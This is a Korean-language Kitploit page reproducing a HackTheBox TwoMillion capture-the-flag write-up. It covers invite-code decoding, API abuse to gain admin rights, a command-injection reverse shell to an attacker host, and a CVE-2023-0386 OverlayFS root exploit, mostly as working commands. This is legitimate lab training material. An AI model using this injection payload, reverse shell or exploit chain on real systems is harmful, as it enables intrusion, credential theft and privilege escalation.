Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
HTB-TwoMillion-Writeup — HackTheBox TwoMillion 머신 라이트업 — API 남용, 명령어 주입 및 CVE-2023-0386 | Kitploit
도구/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
Privilege EscalationReconnaissanceVulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPost-ExploitationCTFPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Command and Control
Learning & Education
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

HackTheBox TwoMillion 머신 라이트업 — API 남용, 명령어 주입 및 CVE-2023-0386

저장소 보기
4개월 전아직 검토되지 않음

HTB-TwoMillion-분석기

HackTheBox TwoMillion 머신 분석기 — API 남용, 명령 삽입 및 CVE-2023-0386

HackTheBox — TwoMillion 분석기

HackTheBox — TwoMillion 분석기

HTB Difficulty OS

머신 정보

필드세부사항
이름TwoMillion
난이도쉬움
운영체제Linux
IP10.10.11.221
CVECVE-2023-0386

요약

TwoMillion은 이전 HackTheBox 플랫폼을 주제로 한 쉬운 난이도의 Linux 머신입니다. 초대 코드 디코딩, API 엔드포인트 남용, OS 명령 삽입, 자격 증명 발견, 그리고 CVE-2023-0386 (OverlayFS)를 통한 Linux 커널 권한 상승을 포함합니다.


정보 수집

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

열린 포트:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → 2million.htb로 리디렉션

/etc/hosts에 추가:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

1단계 — 초대 코드

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

응답은 ROT13으로 인코딩되어 있습니다. 디코딩하세요:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

초대 코드 생성:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

디코딩된 초대 코드를 사용하여 http://2million.htb/register에서 등록하세요.


2단계 — API 남용 → 관리자

브라우저로 로그인하고 쿠키에서 PHPSESSID를 가져옵니다 (F12 → 애플리케이션 → 쿠키).

관리자로 권한 상승:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

확인:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

3단계 — 명령 삽입 → 리버스 셸

리스너 시작:

root@kitploit:~
nc -lvnp 4444

리버스 셸 페이로드 전송:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

www-data로 셸 획득.


4단계 — 사용자 플래그

.env에서 자격 증명 찾기:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

SSH 접속:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

5단계 — 루트 플래그 (CVE-2023-0386)

힌트 확인:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386

Kali에서 익스플로잇 다운로드 및 컴파일:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

타겟으로 전송:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

타겟에서 두 개의 터미널로 실행:

Terminal 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Terminal 2:

root@kitploit:~
./exp

루트 플래그 획득:

root@kitploit:~
cat /root/root.txt

공격 체인


사용된 도구

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

이 분석은 은퇴한 HackTheBox 머신에 대한 교육 목적으로만 작성되었습니다.

도구 다운로드
단계
기법
정찰Nmap 스캔
초대 코드ROT13 + Base64 디코딩
웹 권한 상승API 조작 → 관리자
초기 셸OS 명령 삽입
수평 이동.env 자격 증명 → SSH
루트CVE-2023-0386 OverlayFS 익스플로잇